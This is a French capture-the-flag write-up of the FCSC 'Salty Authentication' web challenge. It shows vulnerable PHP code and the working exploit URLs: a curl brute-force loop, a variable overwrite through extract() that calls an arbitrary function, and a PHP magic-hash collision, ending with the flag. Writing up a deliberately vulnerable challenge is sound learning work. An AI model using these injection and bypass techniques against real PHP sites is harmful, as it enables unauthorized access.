# Salty Authentication

## Énoncé

Un système d'authentification salée...

http://salty-authentication.france-cybersecurity-challenge.fr/

## Solution

> Note: épreuve résolue après la fin du CTF. Comme je l'explique plus bas, il me manquait un élément, que j'ai
> obtenu en lisant une autre solution...

Le code est affiché sur la page :

```php
<?php

error_reporting(0);

include('flag.php');
$salt = bin2hex(random_bytes(12));

extract($_GET);

$secret = gethostname() . $salt;

if (isset($password) && strlen($password) === strlen($secret) && $password !== $secret) {
    if (hash('fnv164', $password) == hash('fnv164', $secret)) {
        exit(htmlentities($flag));
    } else {
        echo('Wrong password!');
        exit($log_attack());
    }
}

highlight_file(__FILE__);

?>
```

En gros, il faut fournir un *password* dont le hash [FNV1-64](https://en.wikipedia.org/wiki/Fowler%E2%80%93Noll%E2%80%93Vo_hash_function) est identique à celui de la concaténation
du *hostname* et d'un sel tiré au hasard.

On note immédiatement deux trucs :
- `extract()` est appelé **après** le calcul du salt, donc on peut écraser sa valeur.
- le test de comparaison des deux hashes utilise l'opérateur simple `==`, on peut donc utiliser le *type juggling* pour
[passer le test](http://phpsadness.com/sad/47) à l'aide d'un *magic hash*. Oui, [*`==` is useless*](https://eev.ee/blog/2012/04/09/php-a-fractal-of-bad-design/#operators).

Mais jouons un peu avec la page avant d'aller plus loin. On essaie un password au hasard mais rien ne se passe. 
Normal : on n'a pas la bonne longueur pour rentrer dans la boucle. Il nous faut déterminer la taille du secret. 
Léger bruteforce sur la taille du mot de passe pour déterminer la taille attendue :


```bash
p=""; while true; do p="${p}a"; curl "https://salty-authentication.france-cybersecurity-challenge.fr/?password=$p"; echo; echo "** $p **"; read; done
[...]
Wrong password!
** aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa **
[...]
```

On sait donc que le secret fait 36 caractères, composés des 24 caractères hexa du *salt* et du hostname, qui
donc en fait 12. Mais comment obtenir le hostname ? J'ai tenté plein de trucs en vain...

> Et c'est ici que je suis resté bloqué. Jusqu'à la lecture [du write-up d'un autre joueur](https://github.com/0x14mth3n1ght/Writeup/tree/master/2023/FCSC/web/salty)...

Le petit détail que je n'avais pas noté jusqu'ici, c'est l'affichage de l'erreur :

```php
        echo('Wrong password!');
        exit($log_attack());
```

Et oui, la fonction `log_attack` est en fait une... variable. Et à ce titre, on peut tout fait l'écraser comme 
n'importe quelle autre grâce à l'`extract()`. Ainsi, en fournissant un mot de passe de 32 caractères et en écrasant
`log_attack` par, au hasard, `gethostname()`, cette dernière est exécutée : 

https://salty-authentication.france-cybersecurity-challenge.fr/?password=000000000000000000000000000000000000&log_attack=gethostname

```
Wrong password!9be4a60f645f
```

Voilà, le `hostname` est donc `9be4a60f645f`.
Évidemment, ce n'est pas fini, car le code attend un *password* différent du secret, mais dont les hashes sont identiques. Pour cela, on
va utiliser les vieilles faiblesses de PHP sur l'opérateur de comparaison faible. En effet, il nous suffit de trouver deux hashes qui
commencent par `0e` qui soient `==` (au sens PHP) à zéro. Sachant que l'on maîtrise les deux sources de hashes :
- on passe *password* en paramètre.
- on connaît le hostname et on maîtrise la valeur de *salt*.

C'est le moment de sortir [un script de brute-force PHP](bf.php). On a très rapidement un résultat :

```console
$ time php bf.php 
Found : 9be4a60f645f000000000000000000161800 = 0e85305075337769
Found : 000000000000000000000000000000544040 = 0e31655281594302

real	0m0,440s
user	0m0,321s
sys	0m0,012s
```

Ainsi, avec un `salt` de "`000000000000000000161800`", le hash du `secret` est considéré comme égal à celui du `password` 
"`000000000000000000000000000000544040`".

https://salty-authentication.france-cybersecurity-challenge.fr/?salt=000000000000000000161800&password=000000000000000000000000000000544040

Ça nous donne le flag `FCSC{d090643090b9ac9dd7cddc1d830f0457213e5b50e7a59f1fe493df69c60ac054}`.

